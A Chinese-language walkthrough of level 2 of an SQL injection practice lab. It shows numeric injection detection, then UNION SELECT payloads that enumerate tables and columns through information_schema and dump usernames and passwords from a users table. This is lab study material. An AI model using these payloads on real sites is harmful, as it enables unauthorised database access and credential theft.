首先我們進入第二關

思路：

1.先判斷是什么類型的注入

2.根據類型我們在找注入點

步驟：

1.提示我們輸入id數字，那我們先輸入1猜一下

2.這里正常回顯，當我們后邊加上'時可以看到報錯，且報錯信息看不到數字，所有我們可以猜測sql語句應該是數字型注入

3. 知道時數字型注入后就簡單了，和之前第一關的差不多一樣

先查庫，在查表和列，最后輸出顯示

?id=1 order by 1

4. 我們就一個一個的試，當輸入4時報錯不知道第四列

5. 歐克，接下來就是正常操作

?id=-1 union select 1,2,3

6. 我們利用第二個位置開始查

?id=-1 union select 1,database(),3

7. 庫名查到就是security

?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27

8. 這不，表名（我們用一下users）就出來了，接下來查一下列名

?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name="users"

9. 這三個已經擺在面前了，那就看一下下里邊都有啥

/?id=-1%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20%20users

10用的和第一個數據庫一樣的，所以里邊的內容都是一樣的，到這里就結束了。?